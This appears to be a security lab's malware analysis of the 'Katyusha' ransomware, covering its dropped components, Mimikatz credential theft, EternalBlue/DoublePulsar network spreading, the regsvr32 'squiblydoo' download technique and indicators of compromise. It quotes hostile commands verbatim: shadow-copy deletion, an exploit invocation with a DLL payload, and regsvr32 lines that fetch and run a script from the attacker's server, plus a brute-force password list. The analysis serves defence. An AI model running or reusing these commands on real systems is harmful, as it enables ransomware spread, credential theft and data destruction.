Sophisticated Ransomware : “Katyusha”

For several months, Quick Heal Security Labs has been observing an increase in ransomware, we have found one more interesting ransomware which encrypts files and adds extension “.katyusha” and demands for an amount of 0.5 btc within three days and threatens to release the data to public download if the ransom is not paid. Malware is bundled with many components including using “Double pulsar” and “Eternal blue” exploit which is used to get spread over the network. Also, uses a unique attack technique called “squiblydoo” to  spread over the network. The infection vector for this ransomware is still not confirmed, but on the basis of attribution this ransomware may enter the system via spear phishing, malvertising, spam mail, SMB exploit etc.

Technical Analysis:

This malware is packed with MPRESS(v2.19) and present on victim’s system with the name “katyusha.exe” at “%temp%”. It contains three components. On execution it drops them into C:\Windows\Temp and starts their execution:

• Svchost0.bat
• Zkts.exe
• Ktsi.exe

Katyusha checks for following files on the system to determine whether the system is already infected or not.

“C:\_how_to_decrypt_you_files.txt”

“C:\ProgramData\_how_to_decrypt_you_files.txt”

If a system is already infected, Katyusha creates a batch file (svchost0.bat) which contains code as shown in Fig.1. to delete self-copy and terminate itself. If the system is not infected then it drops zkts.exe and ktsi.exe and executes them.

Fig 1: Content of Svchost0.bat

Zkts.exe:

This file is 7zip compressed executable and main component which contains multiple sub-modules like network spreading module, password stealing module, etc.

On the execution of zkts.exe, it extracts components in “C:\Windows\Temp” such as Mimikatz, katyusha.dll, eternal blue exploit, etc. those are later used by Katyusha to perform an activity.

Fig 2.Files Dropped by zkts.exe

Ktsi.exe (Encryptor):

This is another main component which is also MPRESS packed file. It is mainly used for file encryption and to drop ransom note on the victim’s system. This process is started independently by main payload (katyusha.exe) as shown in Fig 3.

Fig 3: Call to CreateProcess() for ktsi.exe

On the execution of ktsi.exe, it firstly kills list of following tasks to release handles of files which are locked by relevant processes to encrypt(such as db files, etc) as shown in Fig 4.

To encrypt database related files successfully, ktsi kills processes which are related to database applications. Below is the list of processes hard-coded in malware:

Fig 4: Taskkill command execution.

After the taskkill operation malware drops ransom note in html and txt format at below path to make it visible for all users at system startup,

“C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”

_how_to_decrypt_you_files.txt

_how_to_decrypt_you_files.html

In “C:\ProgramData” and at the root of C drive(C:\) drop only ransom note as “_how_to_decrypt_you_files.txt”.

Fig 5: Ransom Note

Ktsi.exe also deletes shadow copy by executing the following command,

“vssadmin delete shadows /all /quiet”

Fig 6: delete shadow copy

After all these tasks, ktsi.exe starts file encryption (RSA) with the help of standard encryption method of CRYPTOGAMS. Signatures related to this algorithm are found in a file, as shown in Fig 7.

Fig 7: Cryptogams strings.

It encrypts all extension files except the following one,

Fig 8: Excluded Extensions from encryption.

It also contains an exclusion list of files and folders (as shown in fig 9) if found these words in enumerated file path then it will exclude that path from encryption. To perform uninterrupted encryption, list contains names of few security products.

Fig 9: Exclusion list of Files and Folders.

Spreading Mechanism:

For network spreading, files extracted from zkts comes in role. Please refer Fig 2 for extracted components.

m32.exe and m64.exe are Mimikatz tool which are used to fetch credentials from windows lsass.exe.

Firstly, katyusha.exe determine whether the system is 64bit or 32bit using system call IsWow64Process (it returns a nonzero value if the system is 64 bit) and executes Mimikatz according to system architecture.

Mimikatz tool drops following files at “C:\Windows\Temp” as output.

– snamelog :  contains fetched usernames.

– spasslog :  contains passwords for respective fetched usernames.

Fig 10: Check to determine system type and start Mimikatz.

After execution of mimikatz, katyusha.exe reads usernames  from snamelog and passwords from spasslog which are used to perform brute force attack into the network.

Zkts.exe also drops svchostb.exe, svchostb.xml, svchostbs.exe, svchostbs.xml, katyusha.dll and svchostp.exe. These components are used to spread Katyusha over the network.

With the help of dropped eternal blue exploit and double pulsar, malware executes katyusha.dll on systems connected in network sequentially. For this katyusha.exe exploit SMB vulnerability with the help of the following command,

“C:\windows\temp\&svchostb.exe –TargetIp <ip_address> & svchostbs.exe –OutConfig s –TargetPort 445 –Protocol SMB –Architecture x64 –Function RunDLL –DllPayload katyusha.dll –TargetIp <ip_address>”

Fig 11: Execution of exploit on each system in the network.

Katyusha.dll is payload file contains code to execute the following command,

“regsvr32 /u /s /i:hxxp://86.106.102.147/img/katyusha.data scrobj.dll”

We can also find hard-coded strings of command in the file as shown in Fig 12.

Fig 12: Command to download and execute the script from Url

On execution of above regsvr32(Microsoft Register Server) command, it will download script (katyusha.data) from given Url and call unregister server with the parameter of regsvr32 (/u). This will execute javascript code under the <registration> tag from downloaded scriptlet as shown in Fig 13. Script contains code to download katyusha.exe from given Url at “%temp%” directory and execute it.

Fig 13: content of katyusha.data script

Fig 14: Download request for script and payload in infected system.

Such attack with regsvr32 commands to download scriptlet from C&C and executes them is referred as “squiblydoo”.

After above action, It also goes to brute force systems in the network with the help of Power Admin Tool(svchostp.exe). This tool is similar to sysinternals PsExec tool, used to execute processes on remote system. This ransomware itself has the list of few usernames and passwords as given below, along with that it also uses usernames and passwords fetched by Mimikatz (snamelog and spasslog) for brute force attack.

Usernames:

Admin, administrator, +content of snamelog.

Passwords:

admin, 12345, chinachina203, 111, 123456, qwerty, test, abc123, 12345678, 0000, 1122, 1234, +contents of spasslog.

In brute forcing, katyusha uses the following command,

“C:\Windows\temp\svchostp.exe <ip_address> -u <username> -p <password> -n 10 -s regsvr32 /u /s /i:https://86.106.102.147/img/katyusha.data scrobj.dll”

The above command simply executes regsvr32 utility with url as a parameter to download payload and performs activity as explained above for katyusha.dll.

Fig 15.Use of power admin tool (svchostp.exe)

IOC:

   MD5: 7f87db33980c0099739de40d1b725500

   Urls:

1.  hxxp://86.106.102.147/img/katyusha.data
2. hxxp://86.106.102.147/img/katyusha.exe

   Bitcoin Wallet Address: “3ALmvAWLEothnMF5BjckAFaKB5S6zan9PK”

Conclusion:

This year we have seen a spike in number of ransomware, they are using new ways to spread and also for encrypting the data. Now, most ransomware are bundled with exploit and tools like eternal blue, mimikatz for spreading over the network. We suggest users to avoid accessing suspicious Urls/emails, use strong system credentials and keep their antivirus up-to-date.

Subject Matter Expert:

Pratik Pachpor | Quick Heal Security Labs

Ghanshyam More